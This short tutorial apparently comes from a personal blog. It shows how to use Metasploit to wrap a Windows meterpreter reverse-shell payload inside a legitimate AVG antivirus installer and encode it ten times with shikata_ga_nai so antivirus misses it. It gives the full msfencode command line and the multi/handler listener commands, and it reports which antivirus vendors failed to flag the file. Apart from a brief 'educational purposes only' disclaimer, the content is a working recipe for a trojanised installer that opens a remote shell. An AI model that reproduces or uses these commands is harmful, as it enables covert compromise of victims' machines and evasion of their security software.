Metasploit Tutorial 1

This tutorial is for educational purposes only.  I know there are a lot of good tutorials out there but I am creating my own as a quick reference.  Irongeek.com and offensive-security.com have some great video tutorials.  This is just a quick reference using meterpreter.

 


windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8888 R | msfencode -x /home/kod/avg_free_stb_all_9_114_cnet.exe  -t exe -e x86/shikata_ga_nai -c 10 -o evilfile.exe

 

Here I took avg's vaild installer file and use its characteristics into evillfile.exe.  I also encoded it 10 times using shikata_ga_nai.    You take evilfile.exe and place on the target machine.

 

Kick off metasploit and type

 

# use multi/handler
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LHOST 192.168.1.101
# set LPORT 8888
# exploit

 

run your file on the target machine.

 

Also by using avg characteristics and encoding 10 times only Sophos and DrWeb caught that this was really malware.  When I encoded the payload of windows/shell/reverse_tcp Windows Security Essentials and Sophos caught that.  What's up with the main virus players - Symantec, McAfee, and Trend all thought the file was good.